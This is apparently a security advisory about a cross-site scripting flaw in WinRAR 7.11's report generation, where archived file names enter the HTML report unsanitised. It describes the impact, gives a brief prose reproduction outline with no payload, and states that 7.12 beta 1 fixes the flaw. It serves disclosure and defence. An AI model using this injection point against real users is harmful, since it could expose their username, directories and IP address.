Rarlab WinRAR Cross-Site Scripting Vulnerability in Report Generation Feature

A cross-site scripting (XSS) vulnerability has been identified in Rarlab WinRAR version 7.11. This issue arises in the 'generate report' functionality, where archived file names are included in the HTML report without proper validation. As a result, attackers can inject potentially malicious HTML tags, leading to the disclosure of user information such as the computer username, report directory, and IP address. Exploitation of this vulnerability requires user interaction, as the report must be opened after generation.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where injected HTML can be executed, potentially leading to the disclosure of sensitive user information.

Reproduction

To reproduce this vulnerability, use the 'generate report' feature in WinRAR 7.11. After the report is generated, open it to trigger the cross-site scripting vulnerability. The report will contain injected HTML that can execute scripts or manipulate the document structure.

Remediation

Users are advised to update to WinRAR version 7.12 beta 1, which addresses this vulnerability by sanitizing file name characters in the 'generate report' command to prevent HTML injection.